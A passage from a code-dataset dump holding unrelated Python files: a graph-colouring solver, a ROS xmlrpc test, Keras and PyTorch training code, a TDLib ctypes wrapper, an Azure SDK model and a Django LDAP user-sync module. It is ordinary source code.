2 3 4\n1 \t0 1\t1 0\n2\t1 0 0 0\n3 1 0 0 1\n4\t0 0 1 0\n\nVerticies from 1 to 4\ncolors = [Red, Green, Blue], k = 2\nLet 1 be 1 --> colors[1] = Red\nLet 2 be 1 --> Error, adjacent element is 1\nLet 2 be 2 --> colors[2] = Green\nLet 3 be 1 --> Error, adjacent element is 1\nLet 3 be 2 --> Colors[2] = Green\nLet 4 be 1 --> Colors[1] = Red\nSuccessfully placed all colors, return True\n\nk = 1\nLet 1 be 1 --> colors[1] = Red\nLet 2 be 1 --> Error, adjacent element is 1\nFalse, exceeded range and still have more elements, return False\n\n'''\n\ndef solve(matrix, k):\n\tcolors = []\n\n\treturn backtrack(matrix, colors, 0, k)\n\n\ndef backtrack(matrix, colors, node, k):\n\tif node >= len(matrix):\n\t\treturn True\n\n\tfor sub_k in range(k):\n\t\tcolors.append(sub_k)\n\t\tif is_valid(matrix, colors):\n\t\t\tif backtrack(matrix, colors, node + 1, k):\n\t\t\t\treturn True\n\t\tcolors.pop()\n\treturn False\n\ndef is_valid(matrix, colors):\n\tfor node in range(len(matrix)):\n\t\tif node > len(colors) - 1:\n\t\t\treturn True\n\t\tindicies = all_adjacent_index(matrix, node)\n\t\tfor idx in indicies:\n\t\t\tif idx > len(colors) - 1:\n\t\t\t\tcontinue\n\t\t\tif colors[node] == colors[idx]:\n\t\t\t\treturn False\n\treturn True\n\ndef all_adjacent_index(matrix, node):\n\treturn [idx for idx, val in enumerate(matrix[node]) if val == 1]\n\n\n#matrix = [[0,1,1,0],[1,0,0,0],[1,0,0,1],[0,0,1,0]]\nmatrix = [[0,1,0,1],[1,0,1,1],[0,1,0,0],[1,1,0,0]]\nk = 3\n\nprint(solve(matrix, k))","sub_path":"Problem_56/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"310857774","text":"# Software License Agreement (BSD License)\n#\n# Copyright (c) 2009, Willow Garage, Inc.\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n#\n# * Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above\n# copyright notice, this list of conditions and the following\n# disclaimer in the documentation and/or other materials provided\n# with the distribution.\n# * Neither the name of Willow Garage, Inc. 
nor the names of its\n# contributors may be used to endorse or promote products derived\n# from this software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n# \"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\n# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS\n# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE\n# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,\n# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN\n# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\nimport roslib; roslib.load_manifest('test_roslib')\n\nimport os\nimport struct\nimport sys\nimport unittest\n\nimport rosunit\n\nclass RoslibXmlrpcTest(unittest.TestCase):\n \n def test_XmlRpcHandler(self):\n from roslib.xmlrpc import XmlRpcHandler \n # tripwire\n h = XmlRpcHandler()\n # noop\n h._ready('http://localhost:1234')\n def test_XmlRpcNode(self):\n from roslib.xmlrpc import XmlRpcNode\n # not a very comprehensive test (yet)\n #port, handler\n tests = [\n (None, None, None),\n (8080, None, 8080),\n ('8080', None, 8080),\n (u'8080', None, 8080),\n ]\n for port, handler,true_port in tests:\n n = XmlRpcNode(port, handler)\n self.assertEquals(true_port, n.port)\n self.assertEquals(handler, n.handler)\n self.assertEquals(None, n.uri)\n self.assertEquals(None, n.server)\n n.set_uri('http://fake:1234')\n self.assertEquals('http://fake:1234', n.uri) \n\n \nif __name__ == '__main__':\n rosunit.unitrun('test_roslib', 'test_xmlrpc', RoslibXmlrpcTest, coverage_packages=['roslib.xmlrpc'])\n\n","sub_path":"test/test_roslib/test/test_roslib_xmlrpc.py","file_name":"test_roslib_xmlrpc.py","file_ext":"py","file_size_in_byte":2667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"453724304","text":"# ##########################################################################\r\n# Author: Manfred Lee\r\n# Objective: Image pre-processing using Keras\r\n# References: keras documentation\r\n# Remark: Images are randomly augmented based on our arguments with the\r\n# use of ImageDataGenerator\r\n# ##########################################################################\r\n\r\n# --------------------------------------------------------------------------\r\n# Set-up\r\n# --------------------------------------------------------------------------\r\n# Import the library\r\nimport keras\r\nfrom keras.datasets import cifar10\r\nfrom keras.preprocessing.image import ImageDataGenerator\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, Dropout, Flatten\r\nfrom keras.layers import Conv2D, MaxPooling2D\r\nfrom keras.callbacks import EarlyStopping\r\n\r\n# Load the sample data set\r\n(X_train, y_train), (X_test, y_test) = cifar10.load_data()\r\n\r\n# --------------------------------------------------------------------------\r\n# Implementation - The use of ImageDataGenerator combined with CNN\r\n# --------------------------------------------------------------------------\r\ndatagen = ImageDataGenerator(featurewise_center=True,\r\n featurewise_std_normalization=True,\r\n rotation_range=40,\r\n 
rescale=1./255,\r\n width_shift_range=0.2,\r\n height_shift_range=0.2,\r\n shear_range=0.2,\r\n zoom_range=0.2,\r\n horizontal_flip=True,\r\n fill_mode='nearest')\r\n\r\n# compute quantities required for featurewise normalization\r\n# (std, mean, and principal components if ZCA whitening is applied)\r\ndatagen.fit(X_train)\r\n\r\ny_train = keras.utils.to_categorical(y_train, 10)\r\n\r\n# Construct a simple CNN\r\nmodel = Sequential() # initialize the model\r\nmodel.add(Conv2D(32, kernel_size=(3, 3), activation='relu', input_shape=(32, 32, 3)))\r\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\nmodel.add(Dropout(0.3))\r\nmodel.add(Flatten())\r\nmodel.add(Dense(128, activation='relu'))\r\nmodel.add(Dropout(0.5))\r\nmodel.add(Dense(10, activation='softmax'))\r\n\r\nbatch_size = 1024 # Set the batch size for using batch SGD to train the model\r\nepochs = 5 # Set the number of training epochs\r\n\r\n# Specifying the loss function, evaluation metrics and optimizer\r\nmodel.compile(loss='categorical_crossentropy',\r\n optimizer='adam',\r\n metrics=['accuracy'])\r\n\r\n# Allow early stopping\r\nearly_stopping = EarlyStopping(monitor='val_loss', patience=3)\r\n\r\n# Fit the model with randomly augmented figures using ImageDataGenerator\r\nmodel.fit_generator(datagen.flow(X_train, y_train, batch_size=1024), steps_per_epoch=len(X_train) / 1024, epochs=epochs)","sub_path":"Data pre-processing/keras/keras - image preprocessing.py","file_name":"keras - image preprocessing.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"545186402","text":"import pandas as pd\nfrom configparser import ConfigParser\nimport xml.etree.cElementTree as ET\n\n\ndef add_track(data, vlc_id, root_element):\n track_element = ET.SubElement(root_element[1], \"track\")\n ET.SubElement(track_element, \"location\").text = f'dvb-t://frequency={data[\"frequency\"]}:bandwidth=8'\n ET.SubElement(track_element, \"title\").text = f'{data[\"service_name\"]}'\n extension = ET.SubElement(track_element, \"extension\", attrib={'application': 'http://www.videolan.org/vlc/playlist/0'})\n ET.SubElement(extension, \"vlc:id\").text = f'{vlc_id}'\n ET.SubElement(extension, \"vlc:option\").text = 'dvb_adapter=0'\n ET.SubElement(extension, \"vlc:option\").text = 'live-caching=300'\n ET.SubElement(extension, \"vlc:option\").text = 'sout=#display'\n ET.SubElement(extension, \"vlc:option\").text = 'no-sout-all'\n ET.SubElement(extension, \"vlc:option\").text = 'sout-keep'\n ET.SubElement(extension, \"vlc:option\").text = f'program={data[\"service_id\"]}'\n formatted_tree = ET.ElementTree(root)\n formatted_tree.write(\"filename.xspf\", xml_declaration=True, encoding=\"UTF-8\")\n\n\nconfig = ConfigParser()\nconfig.read('channels_1.conf')\ninfo = {}\nfor section in config.sections():\n info[section] = {k: v for k, v in config.items(section)}\n\ndf = pd.DataFrame(info)\n# print(df)\n\nET.register_namespace('', 'http://xspf.org/ns/0/')\nET.register_namespace('vlc', 'http://www.videolan.org/vlc/playlist/ns/0/')\n\ntree = ET.parse('mine.xspf')\nroot = tree.getroot()\n# tracklist = root.find(\"trackList\")\n# for track in root[1]:\n# print(track.tag)\n# for track_attr in track.iter():\n# print(track_attr, track_attr.text)\n\nfor idx, column in enumerate(df):\n add_track(df[column], idx, root)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} 
+{"seq_id":"174282249","text":"import sys\r\n\r\nlines = open(sys.argv[1], 'r')\r\nfor line in lines:\r\n line = line.replace('\\n', '').replace('\\r', '')\r\n if len(line) > 0:\r\n number, pattern = line.split(' ')\r\n indexOfPlus = pattern.find('+')\r\n indexOfMinus = pattern.find('-')\r\n if indexOfPlus >= 0:\r\n a = int(number[0:indexOfPlus])\r\n b = int(number[indexOfPlus::])\r\n print(a + b)\r\n else:\r\n a = int(number[0:indexOfMinus])\r\n b = int(number[indexOfMinus::])\r\n print(a - b)\r\n\r\nlines.close()\r\n","sub_path":"Easy/Split The Number/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"495629600","text":"#! /bin/env python\n#\n# Michael Gibson 27 April 2015\n# Modified Zeke Arneodo Dec 2017\n# Modified Adrian Foy Sep 2018\n\ndef data_to_result(header, data, data_present):\n \"\"\"Moves the header and data (if present) into a common object.\"\"\"\n \n result = {}\n result['t'] = data['t']\n \n stim_parameters = {}\n stim_parameters['stim_step_size'] = header['stim_step_size']\n stim_parameters['charge_recovery_current_limit'] = header['recovery_current_limit']\n stim_parameters['charge_recovery_target_voltage'] = header['recovery_target_voltage']\n stim_parameters['amp_settle_mode'] = header['amp_settle_mode']\n stim_parameters['charge_recovery_mode'] = header['charge_recovery_mode']\n result['stim_parameters'] = stim_parameters\n \n result['stim_data'] = data['stim_data']\n result['spike_triggers'] = header['spike_triggers']\n result['notes'] = header['notes']\n result['frequency_parameters'] = header['frequency_parameters']\n \n if header['dc_amplifier_data_saved']:\n result['dc_amplifier_data'] = data['dc_amplifier_data']\n \n if header['num_amplifier_channels'] > 0:\n if data_present:\n result['compliance_limit_data'] = data['compliance_limit_data']\n result['charge_recovery_data'] = data['charge_recovery_data']\n result['amp_settle_data'] = data['amp_settle_data']\n \n if header['num_board_dig_out_channels'] > 0:\n result['board_dig_out_channels'] = header['board_dig_out_channels']\n if data_present:\n result['board_dig_out_data'] = data['board_dig_out_data']\n \n if header['num_board_dig_in_channels'] > 0:\n result['board_dig_in_channels'] = header['board_dig_in_channels']\n if data_present:\n result['board_dig_in_data'] = data['board_dig_in_data']\n \n if header['num_board_dac_channels'] > 0:\n result['board_dac_channels'] = header['board_dac_channels']\n if data_present:\n result['board_dac_data'] = data['board_dac_data']\n \n if header['num_board_adc_channels'] > 0:\n result['board_adc_channels'] = header['board_adc_channels']\n if data_present:\n result['board_adc_data'] = data['board_adc_data']\n \n if header['num_amplifier_channels'] > 0:\n result['amplifier_channels'] = header['amplifier_channels']\n if data_present:\n result['amplifier_data'] = data['amplifier_data']\n \n return result","sub_path":"Stim Analysis/intanutil/data_to_result.py","file_name":"data_to_result.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"312457932","text":"import time\nimport torch\nfrom torch.cuda import amp\nimport sys\nsys.path.append(\"./libs/utils\")\nfrom eval import AverageMeter, accuracy\nfrom torch.utils.tensorboard import SummaryWriter\n\n\ndef to_python_float(t):\n if hasattr(t, 'item'):\n return t.item()\n else:\n return t[0]\n \nclass Trainer:\n 
def __init__(self, model, optimizer, scheduler, criterion, device, config):\n self.model = model.to(device)\n self.optimizer = optimizer\n self.scheduler = scheduler\n self.criterion = criterion.to(device)\n self.scaler = amp.GradScaler() \n self.device = device\n self.config = config\n self.top1 = AverageMeter()\n self.t_losses = AverageMeter()\n self.v_losses = AverageMeter()\n self.writer = SummaryWriter(log_dir=\"./logs/\"+self.config.f_name)\n self.iter = 0\n \n def fit(self, train_dl, val_dl):\n torch.backends.cudnn.benchmark = True\n best_top1 = 0.0\n for i in range(self.config.n_epochs):\n start = time.time()\n self.train_one_epoch(train_dl)\n self.validation(val_dl)\n lr = self.optimizer.param_groups[0]['lr']\n self.log(f'[RESULT]: Epoch: {i+1}, train_loss: {self.t_losses.avg:.4f}, val_loss: {self.v_losses.avg:.5f}, top1: {self.top1.avg:.3f}, lr: {lr:.5f}, time: {(time.time() - start):.3f}')\n self.writer.add_scalar('train_loss', round(self.t_losses.avg, 5), i+1)\n self.writer.add_scalar('val_loss', round(self.v_losses.avg, 5), i+1)\n self.writer.add_scalar('top1_acc', round(self.top1.avg, 5), i+1)\n \n if best_top1 < self.top1.avg:\n best_top1 = self.top1.avg\n self.save(epoch=i+1, top1=self.top1.avg)\n self.save(epoch=self.config.n_epochs, top1=self.top1.avg, last=True)\n self.writer.close()\n def train_one_epoch(self, train_dl):\n self.model.train()\n self.t_losses.reset()\n itr_start = time.time()\n for img, target in train_dl:\n self.optimizer.zero_grad()\n with amp.autocast(enabled=True):\n pred = self.model(img.to(self.device))\n loss = self.criterion(pred, target.to(self.device))\n self.scaler.scale(loss).backward()\n self.scaler.step(self.optimizer)\n self.scaler.update()\n self.scheduler.step()\n self.t_losses.update(loss.item(), self.config.train_batch_size)\n \n #------------可視化------------\n if (self.iter % 100) == 0 :\n print(f'iter : {self.iter} time : {int(time.time() - itr_start)}sec')\n itr_start = time.time()\n self.iter += 1\n def validation(self, val_dl):\n self.model.eval()\n self.top1.reset()\n self.v_losses.reset()\n for img, target in val_dl:\n with amp.autocast(enabled=True):\n pred = self.model(img.to(self.device))\n loss = self.criterion(pred, target.to(self.device))\n [prec1] = accuracy(pred.data.cpu().float(), target.cpu().float(), topk=(1, ))\n self.top1.update(to_python_float(prec1), img.size(0))\n self.v_losses.update(loss.item(), self.config.val_batch_size)\n \n def save(self, epoch, top1, last=False):\n if last:\n l_or_b = '_last.bin'\n else:\n l_or_b = '_best.bin'\n torch.save({\n 'model_state_dict': self.model.state_dict(), \n 'top1': top1,\n 'epoch': epoch,\n }, self.config.weight_path + l_or_b)\n \n def log(self, message):\n if self.config.verbose:\n print(message)\n with open(self.config.log_path + '.txt', mode='a') as logger:\n logger.write(f'{message}\\n')","sub_path":"libs/Trainer/Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":3826,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"110468678","text":"from __future__ import annotations\n\nimport logging\nimport ctypes\nimport typing\nimport pathlib\nimport locale\nimport platform\nimport json\n\nimport attr\nimport pyhocon\n\nimport pytelegram_dl\nimport pytelegram_dl.constants as constants\n\n\nlogger = logging.getLogger(__name__)\n\n@attr.s(auto_attribs=True, frozen=True)\nclass TdlibConfiguration:\n\n database_directory:pathlib.Path = attr.ib()\n use_message_database:bool = attr.ib()\n use_secret_chats:bool 
= attr.ib()\n api_id:int = attr.ib()\n api_hash:str = attr.ib()\n enable_storage_optimizer:bool = attr.ib()\n system_language_code:str = attr.ib()\n device_model:str = attr.ib()\n system_version:str = attr.ib()\n application_version:str = attr.ib()\n library_path:pathlib.Path = attr.ib()\n tdlib_log_file_path:pathlib.Path = attr.ib()\n\n def get_tdlibparams_json_params(self) -> dict:\n\n d = {\n \"database_directory\": str(self.database_directory),\n \"use_message_database\": self.use_message_database,\n \"use_secret_chats\": self.use_secret_chats,\n \"api_id\": self.api_id,\n \"api_hash\": self.api_hash,\n \"system_language_code\": self.system_language_code,\n \"device_model\": self.device_model,\n \"system_version\": self.system_version,\n \"application_version\": self.application_version,\n \"enable_storage_optimizer\": self.enable_storage_optimizer}\n\n return d\n\n @staticmethod\n def init_from_config(config:pyhocon.config_tree.ConfigTree) -> TdlibConfiguration:\n\n try:\n\n c = config.get_config(\"pytelegram_dl.tdlib_configuration\")\n\n tmp_path = pathlib.Path(c.get_string(\"database_directory_path\")).resolve()\n tmp_msgdb = c.get_bool(\"use_message_database\")\n tmp_secretchat = c.get_bool(\"use_secret_chats\")\n tmp_storageopt = c.get_bool(\"enable_storage_optimizer\")\n\n tmp_authid = c.get_int(\"auth.api_id\")\n tmp_authhash = c.get_string(\"auth.api_hash\")\n\n # use defaultlocale for now becuase of https://bugs.python.org/issue38805\n tmp_lang = locale.getdefaultlocale()[0]\n tmp_model = \"Desktop\"\n tmp_sysver = f\"{platform.system()} {platform.version()}\"\n tmp_ver = f\"pytelegram_dl {pytelegram_dl.__version__} / Python {platform.python_version()}\"\n tmp_lpath = pathlib.Path(config.get_string(\"pytelegram_dl.library_path\"))\n tmp_tdlogpath = pathlib.Path(config.get_string(\"pytelegram_dl.tdlib_log_file\"))\n\n final_cfg = TdlibConfiguration(\n database_directory=tmp_path,\n use_message_database=tmp_msgdb,\n use_secret_chats=tmp_secretchat,\n api_id=tmp_authid,\n api_hash=tmp_authhash,\n enable_storage_optimizer=tmp_storageopt,\n system_language_code=tmp_lang,\n device_model=tmp_model,\n system_version=tmp_sysver,\n application_version=tmp_ver,\n library_path=tmp_lpath,\n tdlib_log_file_path=tmp_tdlogpath)\n\n logger.debug(\"new TdlibConfiguration from configuration: `%s`\", final_cfg)\n return final_cfg\n\n\n except pyhocon.exceptions.ConfigException as e:\n\n logger.exception(\"TdlibConfiguration.init_from_config: error when reading needed values from configuration\")\n raise e\n except Exception as e:\n logger.exception(\"TdlibConfiguration.init_from_config: unexpected error\")\n raise e\n\n\n@attr.s(auto_attribs=True, frozen=True)\nclass TdlibHandle:\n\n\n tdlib_shared_library:ctypes.CDLL = attr.ib()\n\n tdlib_config:TdlibConfiguration = attr.ib()\n\n # these are all of these types:\n #\n # ._FuncPtr'>\n # not sure how to represent that with typing.Callable\n func_client_create:typing.Any = attr.ib()\n func_client_receive:typing.Any = attr.ib()\n func_client_send:typing.Any = attr.ib()\n func_client_execute:typing.Any = attr.ib()\n func_client_destroy:typing.Any = attr.ib()\n func_set_log_fatal_error_callback:typing.Any = attr.ib()\n\n # type for passing in a python function to the tdlib function set+log_fatal_error_callback\n fatal_error_callback_type = ctypes.CFUNCTYPE(None, ctypes.c_char_p)\n\n # gets set afterwards\n tdlib_client:typing.Any = attr.ib(default=None)\n\n @staticmethod\n def fatal_error_callback(error_message:str) -> None:\n logger.error(\"TDLib 
fatal error: `%s`\", error_message)\n\n\n @staticmethod\n def init_from_config(tdlib_config:TdlibConfiguration) -> TdlibHandle:\n\n try:\n\n tdjson = ctypes.CDLL(str(tdlib_config.library_path))\n\n\n # load TDLib functions from shared library\n td_json_client_create = tdjson.td_json_client_create\n td_json_client_create.restype = ctypes.c_void_p\n td_json_client_create.argtypes = []\n\n td_json_client_receive = tdjson.td_json_client_receive\n td_json_client_receive.restype = ctypes.c_char_p\n td_json_client_receive.argtypes = [ctypes.c_void_p, ctypes.c_double]\n\n td_json_client_send = tdjson.td_json_client_send\n td_json_client_send.restype = None\n td_json_client_send.argtypes = [ctypes.c_void_p, ctypes.c_char_p]\n\n td_json_client_execute = tdjson.td_json_client_execute\n td_json_client_execute.restype = ctypes.c_char_p\n td_json_client_execute.argtypes = [ctypes.c_void_p, ctypes.c_char_p]\n\n td_json_client_destroy = tdjson.td_json_client_destroy\n td_json_client_destroy.restype = None\n td_json_client_destroy.argtypes = [ctypes.c_void_p]\n\n fatal_error_callback_type = ctypes.CFUNCTYPE(None, ctypes.c_char_p)\n\n td_set_log_fatal_error_callback = tdjson.td_set_log_fatal_error_callback\n td_set_log_fatal_error_callback.restype = None\n td_set_log_fatal_error_callback.argtypes = [TdlibHandle.fatal_error_callback_type]\n\n # set the callback\n c_on_fatal_error_callback = fatal_error_callback_type(TdlibHandle.fatal_error_callback)\n td_set_log_fatal_error_callback(c_on_fatal_error_callback)\n\n res = TdlibHandle(\n tdlib_shared_library=tdjson,\n tdlib_config=tdlib_config,\n tdlib_client=None, # no client yet\n func_client_create=td_json_client_create,\n func_client_receive=td_json_client_receive,\n func_client_send=td_json_client_send,\n func_client_execute=td_json_client_execute,\n func_client_destroy=td_json_client_destroy,\n func_set_log_fatal_error_callback=td_set_log_fatal_error_callback)\n\n logger.debug(\"new TdlibHandle from configuration: `%s`\", res)\n return res\n\n except Exception as e:\n logger.exception(\"TdlibHandle.init_with_configuration: unknown exception\")\n raise e\n\n\n def create_client(self) -> TdlibHandle:\n ''' creates a client and returns a new instance of TdlibHandle with the new client\n '''\n\n if self.tdlib_client is not None:\n raise Exception(\"TdlibHandle.create_client called when a client already exists\")\n\n logger.info(\"creating tdlib client\")\n new_client = self.func_client_create()\n logger.info(\"tdlib client created successfully: `%s`\", new_client)\n\n return attr.evolve(self, tdlib_client=new_client)\n\n def send(self, json_to_send) -> None:\n\n if self.tdlib_client is None:\n raise Exception(\"TdlibHandle.send called when no client has been created\")\n\n logger.info(\"tdlib client send called with: `%s`\", json_to_send)\n json_str = json.dumps(json_to_send)\n json_bytes = json_str.encode(\"utf-8\")\n\n self.func_client_send(self.tdlib_client, json_bytes)\n logger.info(\"tdlib client send called successfully\")\n\n def execute(self, json_to_send) -> dict:\n\n if self.tdlib_client is None:\n raise Exception(\"TdlibHandle.send called when no client has been created\")\n\n logger.info(\"tdlib client execute called with: `%s`\", json_to_send)\n json_str = json.dumps(json_to_send)\n json_bytes = json_str.encode(\"utf-8\")\n\n res = self.func_client_execute(self.tdlib_client, json_bytes)\n logger.info(\"tdlib client execute called successfully: `%s`\", res)\n\n # result is None if the request can't be parsed\n if res is not None:\n return 
json.loads(res)\n        else:\n            return res\n\n    def receive(self) -> dict:\n\n        if self.tdlib_client is None:\n            raise Exception(\"TdlibHandle.receive called when no client has been created\")\n\n        logger.info(\"tdlib client receive called\")\n        res = self.func_client_receive(self.tdlib_client, constants.TDLIB_CLIENT_RECEIVE_TIMEOUT)\n        logger.info(\"tdlib client receive called successfully, result: `%s`\", res)\n\n        # result is None if the timeout expired\n        if res is not None:\n            return json.loads(res)\n        else:\n            return res\n\n\n    def destroy_client(self) -> TdlibHandle:\n        ''' destroys the client and returns a new instance of TdlibHandle with the\n        client removed\n        '''\n\n        logger.info(\"destroying tdlib client\")\n        self.func_client_destroy(self.tdlib_client)\n        logger.info(\"tdlib client destroyed successfully\")\n        return attr.evolve(self, tdlib_client=None)","sub_path":"pytelegram_dl/tdlib.py","file_name":"tdlib.py","file_ext":"py","file_size_in_byte":9587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"111225759","text":"# coding=utf-8\n# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# coding: utf-8\n# pylint: skip-file\nfrom msrest.serialization import Model\n\n\nclass ArtifactSource(Model):\n    \"\"\"Properties of an artifact source.\n\n    :param display_name: The artifact source's display name.\n    :type display_name: str\n    :param uri: The artifact source's URI.\n    :type uri: str\n    :param source_type: The artifact source's type. Possible values include:\n     'VsoGit', 'GitHub'\n    :type source_type: str or :class:`SourceControlType\n     <azure.mgmt.devtestlabs.models.SourceControlType>`\n    :param folder_path: The folder containing artifacts.\n    :type folder_path: str\n    :param arm_template_folder_path: The folder containing Azure Resource\n     Manager templates.\n    :type arm_template_folder_path: str\n    :param branch_ref: The artifact source's branch reference.\n    :type branch_ref: str\n    :param security_token: The security token to authenticate to the artifact\n     source.\n    :type security_token: str\n    :param status: Indicates if the artifact source is enabled (values:\n     Enabled, Disabled). 
Possible values include: 'Enabled', 'Disabled'\n    :type status: str or :class:`EnableStatus\n     <azure.mgmt.devtestlabs.models.EnableStatus>`\n    :param created_date: The artifact source's creation date.\n    :type created_date: datetime\n    :param provisioning_state: The provisioning status of the resource.\n    :type provisioning_state: str\n    :param unique_identifier: The unique immutable identifier of a resource\n     (Guid).\n    :type unique_identifier: str\n    :param id: The identifier of the resource.\n    :type id: str\n    :param name: The name of the resource.\n    :type name: str\n    :param type: The type of the resource.\n    :type type: str\n    :param location: The location of the resource.\n    :type location: str\n    :param tags: The tags of the resource.\n    :type tags: dict\n    \"\"\"\n\n    _attribute_map = {\n        'display_name': {'key': 'properties.displayName', 'type': 'str'},\n        'uri': {'key': 'properties.uri', 'type': 'str'},\n        'source_type': {'key': 'properties.sourceType', 'type': 'str'},\n        'folder_path': {'key': 'properties.folderPath', 'type': 'str'},\n        'arm_template_folder_path': {'key': 'properties.armTemplateFolderPath', 'type': 'str'},\n        'branch_ref': {'key': 'properties.branchRef', 'type': 'str'},\n        'security_token': {'key': 'properties.securityToken', 'type': 'str'},\n        'status': {'key': 'properties.status', 'type': 'str'},\n        'created_date': {'key': 'properties.createdDate', 'type': 'iso-8601'},\n        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},\n        'unique_identifier': {'key': 'properties.uniqueIdentifier', 'type': 'str'},\n        'id': {'key': 'id', 'type': 'str'},\n        'name': {'key': 'name', 'type': 'str'},\n        'type': {'key': 'type', 'type': 'str'},\n        'location': {'key': 'location', 'type': 'str'},\n        'tags': {'key': 'tags', 'type': '{str}'},\n    }\n\n    def __init__(self, display_name=None, uri=None, source_type=None, folder_path=None, arm_template_folder_path=None, branch_ref=None, security_token=None, status=None, created_date=None, provisioning_state=None, unique_identifier=None, id=None, name=None, type=None, location=None, tags=None):\n        self.display_name = display_name\n        self.uri = uri\n        self.source_type = source_type\n        self.folder_path = folder_path\n        self.arm_template_folder_path = arm_template_folder_path\n        self.branch_ref = branch_ref\n        self.security_token = security_token\n        self.status = status\n        self.created_date = created_date\n        self.provisioning_state = provisioning_state\n        self.unique_identifier = unique_identifier\n        self.id = id\n        self.name = name\n        self.type = type\n        self.location = location\n        self.tags = tags\n","sub_path":"src/command_modules/azure-cli-lab/azure/cli/command_modules/lab/sdk/devtestlabs/models/artifact_source.py","file_name":"artifact_source.py","file_ext":"py","file_size_in_byte":4202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
{"seq_id":"629709146","text":"from django.db import models\nfrom django.contrib.auth.models import User\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom django.conf import settings\nimport ldap\n\n\ndef sync_ldap_users():\n    \"\"\"\n    Sync users from ldap to this app's database\n\n    This function does not:\n    * Delete users deleted in ldap from app's database\n\n    This function expects:\n    * Users have valid uid entry\n    * Users might have mail entry\n    \"\"\"\n    l = ldap.initialize(settings.AUTH_LDAP_SERVER_URI)\n    l.simple_bind_s(settings.AUTH_LDAP_BIND_DN, settings.AUTH_LDAP_BIND_PASSWORD)\n    ldapusers = l.search_s(settings.AUTH_LDAP_USERS_DN, \\\n                           ldap.SCOPE_ONELEVEL, \\\n                           \"cn=*\", \\\n                           
attrlist=[\"uid\", \"mail\"])\n l.unbind()\n\n for ldapuser in ldapusers:\n uid = ldapuser[1][\"uid\"][0].decode(\"utf-8\")\n\n # Email field might be empty\n try:\n email = ldapuser[1][\"mail\"][0].decode(\"utf-8\")\n except KeyError:\n email = \"\"\n\n try:\n userobj = _get_user(uid)\n userobj.email = email\n userobj.save()\n except User.DoesNotExist:\n pass\n\n\ndef _get_user(username):\n \"\"\"\n Get User object from app's database or from ldap if it doesn't exist. Throw\n User.DoesNotExist if it doesn't exist in either one\n \"\"\"\n try:\n user = User.objects.get(username=username)\n except User.DoesNotExist:\n l = ldap.initialize(settings.AUTH_LDAP_SERVER_URI)\n l.simple_bind_s(settings.AUTH_LDAP_BIND_DN, settings.AUTH_LDAP_BIND_PASSWORD)\n \n ldapuser = l.search_s(settings.AUTH_LDAP_USERS_DN, \\\n ldap.SCOPE_ONELEVEL, \\\n \"uid={}\".format(username))\n l.unbind()\n\n if len(ldapuser) != 0:\n user = User.objects.create_user(username=username)\n else:\n raise User.DoesNotExist\n\n \n return user\n\n\nclass UserProfile(models.Model):\n \"\"\"\n Needed for additional functionality of users.\n \"\"\"\n user = models.OneToOneField(User, primary_key=True)\n\n @property\n def balance(self):\n \"\"\"\n Property that calculates user's current balance from transaction\n objects.\n\n Example usage:\n balance = foo.userprofile.balance\n \"\"\"\n transactions = Transaction.objects.filter(user=self.user)\n money = 0\n for transaction in transactions:\n money += transaction.amount\n\n return money\n\n def __str__(self):\n return str(self.user.id) or \"\"\n\n\n@receiver(post_save, sender=User)\ndef handle_user_save(sender, instance, created, **kwargs):\n # Userprofile isn't automatically created when creating user\n if created:\n UserProfile.objects.create(user=instance)\n\n\nclass Transaction(models.Model):\n \"\"\"\n Event where money goes into user's account (positive amount, user tops up\n their account)\n or goes away from user's account (negative amount, user buys something)\n\n DecimalField should be safe unlike floats\n \"\"\"\n user = models.ForeignKey(User)\n amount = models.DecimalField(decimal_places=2, max_digits=7)\n timestamp = 